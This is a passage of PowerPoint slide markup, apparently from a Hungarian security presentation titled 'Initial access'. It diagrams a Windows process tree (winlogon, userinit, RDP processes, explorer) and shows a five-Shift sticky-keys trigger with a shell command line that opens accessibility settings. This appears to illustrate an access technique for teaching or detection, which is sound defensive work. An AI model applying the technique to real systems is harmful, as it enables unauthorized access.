          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="310" name="Rounded Rectangle 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7790DF85-2AEE-0EB8-6093-91B8677C819F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12600383" y="1103018"/>
                <a:ext cx="3781942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11" name="Graphic 310">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BE5BB6A-399A-799C-1152-BC54D6051D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/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12766356" y="1162059"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="312" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2107522D-6F49-66CE-53A6-BE18B6D529D0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341700" y="914400"/>
                <a:ext cx="3102157" cy="834390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kern="0" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="FFFF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easeofaccessdialog</a:t>
                </a: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.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="313" name="Group 312">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80565E3D-3FCF-A898-AF13-30A7FD7BA8E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8856329" y="6005433"/>
              <a:ext cx="3382211" cy="788015"/>
              <a:chOff x="12600384" y="914400"/>
              <a:chExt cx="3843473" cy="834390"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="314" name="Rounded Rectangle 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1AFD7D4-1984-DFA6-0E4C-CE4501D57BC7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12600384" y="1103018"/>
                <a:ext cx="2629073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15" name="Graphic 314">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F6F1436-3553-A17E-8183-FA95E13CB5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/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12766356" y="1162059"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="316" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{826FAE4C-913C-190C-A1A1-4BA9D526290A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341700" y="914400"/>
                <a:ext cx="3102157" cy="834390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kern="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF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explorer</a:t>
                </a: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.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="317" name="Elbow Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D56F311D-8D86-C5CB-11AE-6C85EF7D8162}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="314" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="8461344" y="6009662"/>
              <a:ext cx="625719" cy="164251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346" name="Group 345">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1D28139-77CA-97BD-4371-8D9DE46CDFE5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8781435" y="6769865"/>
              <a:ext cx="4187982" cy="1101473"/>
              <a:chOff x="9280112" y="7261477"/>
              <a:chExt cx="4187982" cy="1101473"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="341" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58667144-7831-ACFE-6C10-04D8A996A80C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9549768" y="7261477"/>
                <a:ext cx="3918326" cy="1101473"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln cap="rnd">
                <a:noFill/>
                <a:round/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="63500">
                  <a:srgbClr val="D80B55">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:glow>
                <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="D80B55"/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lvl="0" defTabSz="1371600"/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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>Command Line</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" kern="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>: </a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="1600" kern="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" kern="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{D555645E-D4F8-4c29-A827-D93C859C4F2A}\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" kern="0" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>pageStickyKeysSettings</a:t>
                </a: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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="342" name="Graphic 341">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0134E7A9-4D08-E68D-FF0B-209A3F849C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9280112" y="7304609"/>
                <a:ext cx="264171" cy="283513"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grp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6E9F9FF8-B977-A786-CB3F-10A077108683}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2886651" y="3039897"/>
            <a:ext cx="1674405" cy="442159"/>
            <a:chOff x="12235545" y="1103018"/>
            <a:chExt cx="1902758" cy="468180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="371" name="Rounded Rectangle 75">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C56660D-644E-EB99-D415-121C4C4194F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12235545" y="1103018"/>
              <a:ext cx="1902757" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="424D5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9489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K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2" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B39AB149-B7B1-22BB-D7CD-2607B88221B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12324833" y="1138270"/>
              <a:ext cx="1813470" cy="413599"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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18113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solas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>winlogon.exe</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Rectangle: Rounded Corners 368">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5801E2A-7760-E5BE-9825-34A7FA8C36DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544080" y="5705913"/>
            <a:ext cx="2909979" cy="104741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[SHIFT] x 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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102AFE09-361C-8816-82B5-9A66AF2715C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="417810" y="4375133"/>
            <a:ext cx="3031779" cy="3096136"/>
            <a:chOff x="417810" y="4375133"/>
            <a:chExt cx="3031779" cy="3096136"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="27" name="Elbow Connector 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39C60422-1A45-2121-8052-393BA76EA65E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="5" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="260808" y="4895772"/>
              <a:ext cx="583229" cy="218109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3A0AAC0B-001D-9CF7-AE81-60673FA298A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1093728" y="6683254"/>
              <a:ext cx="2355861" cy="788015"/>
              <a:chOff x="12600384" y="914400"/>
              <a:chExt cx="2677150" cy="834390"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="Rounded Rectangle 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{007D291F-0609-27F7-E840-6751BF15A18C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12600384" y="1103018"/>
                <a:ext cx="2666325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54" name="Graphic 53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B3C781C-8042-6D73-A424-0596B22C7E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/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12766356" y="1162059"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC7DE43E-08AE-0A76-770C-A824DE9C35E7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341700" y="914400"/>
                <a:ext cx="1935834" cy="834390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rdpshell.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="56" name="Elbow Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DDE713D-B66F-7D1F-5880-77DF07E02068}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="53" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="153380" y="6142121"/>
              <a:ext cx="1564948" cy="315748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D2FE8405-DBD3-ED3F-E708-4440AE3907ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1044004" y="5677075"/>
              <a:ext cx="2291285" cy="788015"/>
              <a:chOff x="12600383" y="914400"/>
              <a:chExt cx="2603767" cy="834390"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="88" name="Rounded Rectangle 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F59DCF-DFA7-26E3-A26A-CAAEF6901093}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12600383" y="1103018"/>
                <a:ext cx="2571294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89" name="Graphic 88">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B710FCD-18E4-F51A-96CF-B3E9D99F20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/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12766356" y="1162059"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="90" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E4B9EE1-45FF-90ED-F081-AB558F9788CF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341700" y="914400"/>
                <a:ext cx="1862450" cy="834390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outlook.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="91" name="Elbow Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB3C78A-7689-1DE9-7C25-B90EB9F2CB6D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="88" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="485496" y="5517782"/>
              <a:ext cx="851690" cy="265326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0BB7D62-347C-75FC-12ED-4DCA9F676B24}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="661477" y="4897227"/>
              <a:ext cx="2768022" cy="788015"/>
              <a:chOff x="12600384" y="914400"/>
              <a:chExt cx="3145521" cy="834390"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rounded Rectangle 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC7FEEFC-99DC-B30C-7E24-B97B454B1336}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12600384" y="1103018"/>
                <a:ext cx="2404204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6" name="Graphic 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CE6B7E8-6BE6-D6D3-ADEC-977E0852EE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/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12766356" y="1162059"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E27DAA80-C2B2-0FA2-C8A9-14971BCA88B9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341701" y="914400"/>
                <a:ext cx="2404204" cy="834390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rdpinit.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="373" name="Group 372">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E31D839-DE0E-622B-F043-4954BBF90F42}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="417810" y="4375133"/>
              <a:ext cx="1768546" cy="442159"/>
              <a:chOff x="12235545" y="1103018"/>
              <a:chExt cx="2009738" cy="468180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="374" name="Rounded Rectangle 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E297319-F89E-0EBF-7F18-D305F51B4A9A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12235545" y="1103018"/>
                <a:ext cx="2009737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5" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAC3E402-A7A4-C29F-48C3-405EBB889671}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12379151" y="1139122"/>
                <a:ext cx="1866132" cy="431225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userinit.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="376" name="Elbow Connector 133">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B9E254B-6935-4BE4-17AE-C5EC4FE29F83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="375" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2173535" y="3517779"/>
            <a:ext cx="1107902" cy="1082259"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="Rectangle 395">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{978A5463-FC82-257A-A80D-DF4B5C7AF1FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4303805" y="7082468"/>
            <a:ext cx="2982819" cy="221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9" name="Straight Arrow Connector 398">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEE50425-312E-2A1E-8676-664D8C52EA1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="369" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3454059" y="5249951"/>
            <a:ext cx="899962" cy="979671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2" name="Straight Arrow Connector 401">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D63CE173-8C2D-D39C-3EB8-E0E3745D5F62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="396" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7286624" y="5354983"/>
            <a:ext cx="1439914" cy="183802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Kép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92895" y="4660"/>
            <a:ext cx="189574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85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DE184-16E4-4408-E0F2-099D58698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Rectangle: Rounded Corners 367">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A88074F3-BC6B-C239-475F-7520C56E1C59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3867983" y="1967288"/>
            <a:ext cx="8934954" cy="7029881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" name="Rectangle: Rounded Corners 366">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91A9CAF0-BDB6-E654-5689-FA8DDDA21CC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13120294" y="4069066"/>
            <a:ext cx="4381315" cy="226944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!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B92978EC-5FB1-2F1A-D0CB-A1A66BB7558F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059076" y="851318"/>
            <a:ext cx="14745843" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="1876318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23"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>Kezdeti hozzáférés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
